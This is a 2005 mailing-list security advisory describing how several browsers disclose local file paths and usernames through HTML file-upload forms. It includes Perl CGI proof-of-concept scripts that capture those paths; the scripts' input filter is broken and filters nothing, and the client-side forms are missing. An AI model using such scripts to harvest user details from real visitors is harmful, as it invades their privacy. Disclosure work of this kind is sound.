Multi browser sensitive information disclosure I. DESCRIPTION: Mr.upken disclosed this issue publicly on 19th Feb. 2005. Here is his advisory.(language is Japanese) http://xxx.upken.jp/report/ieup/ I have a few additional details to add to his original advisory. II. IMPACT: Disclosure of sensitive information to an unauthorised user. III. TECHNICAL DETAILS: RFC1867 is the standard definition of that "Browse..." button that you use to upload files to a Web server. It introduced the INPUT field type="file", which is that button, and also specified a multipart form encoding which is capable of encapsulating files for upload along with all the other fields on an upload form. As Mr.upken has mentioned in his advisory, there is a weakness in "Form-based File Upload in HTML". "When we use InternetExplorer" , he says ,"secret or sensitive information can be exposed by an malicious people." I have tested some examples, and it is found that Firefox, Opera, and InternetExplorer have a weakness.( tested on WindowsXPSp2 ) IV. Proof of Concept [A]. server-side Perl CGI.(ask.cgi) - --------------------------- #!/usr/bin/perl print "Content-Type: text/html\n\n"; die if $ENV{CONTENT_LENGTH} > 100*1024; $objectname = "RFC1867"; $boundary = ; $boundary =~s /\r\n//; while(){ if($_ =~ /$objectname/){ ~s/\r\n//; ~s/"//g; @dum = split(/filename=/, $_); $rfc1867 = $dum[@dum - 1]; } } &Filtertxt( $rfc1867 ); print "$rfc1867\n"; exit(0); sub Filtertxt { local( $ft ) = @_; $fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g; return( $ft ) ; } - --------------------------- client-side FORM. - ---------------------------
- --------------------------- NOTE: Method is "POST". When we upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that only IE has a weakness. V. Proof of Concept [B]. server-side Perl CGI.(named ask2.cgi) - --------------------------- #!/usr/bin/perl if($ENV{'REQUEST_METHOD'} eq 'POST'){ #reads inputted variables through POST read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); } else{ #reads inputted variables through GET $buffer = $ENV{'QUERY_STRING'}; } #splits the variables at & @pairs = split(/&/, $buffer); foreach $pair (@pairs) { #sets the value and name of each var ($name, $value) = split(/=/, $pair); #makes each + into a space $value =~ tr/+/ /; #URL decode $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; #filter out bad characters & # < > " ' $value = &Filtertxt( $value ); #sets the varibles in a hash $FORM{$name} = $value; } #print html . print "Content-Type: text/html\n"; print "\n"; print "$FORM{'XB'}\n"; print "
\n"; print "$FORM{'RFC1867'}\n"; exit(0); sub Filtertxt { local( $ft ) = @_; $fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g; return( $ft ) ; } - --------------------------- client-side FORM. - ---------------------------
- --------------------------- NOTE: Method is "GET". When we try to upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that both Opera and IE have a weakness. V. Proof of Concept [C]. server-side Perl CGI is as same as Proof of Concept [B]. client-side FORM. - ---------------------------
- --------------------------- NOTE: Method is "GET". When we try to upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that all Firefox,Opera and IE have a weakness, using evil JavaScript scripting. VI. Other browser on Other OS. not tested. But...... VII. Is this a vulnerability? At once I had used InternetExplore as a FTP tool. Today, when I am testing PoC3, browsing upload file, using Firefox , I find "MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg" and upload it to another server. Then my monitor displays C:\Documents and Settings\%USERNAME%\Local Settings\ Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg Oh,no. YB6J6PY3 ! It is no matter. I guess this is NOT a vulnerability, maybe. VIII. Workaround Do not upload any file onto untrusted server. Do not attach any file ( while sending WebMAIL, posting ML,etc). With killing JavaScript , use Firefox. VIII. Credit Discovery: upken Additional Research: bitlance winter BEST REGARDS. -- bitlance winter _________________________________________________________________ Don’t just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html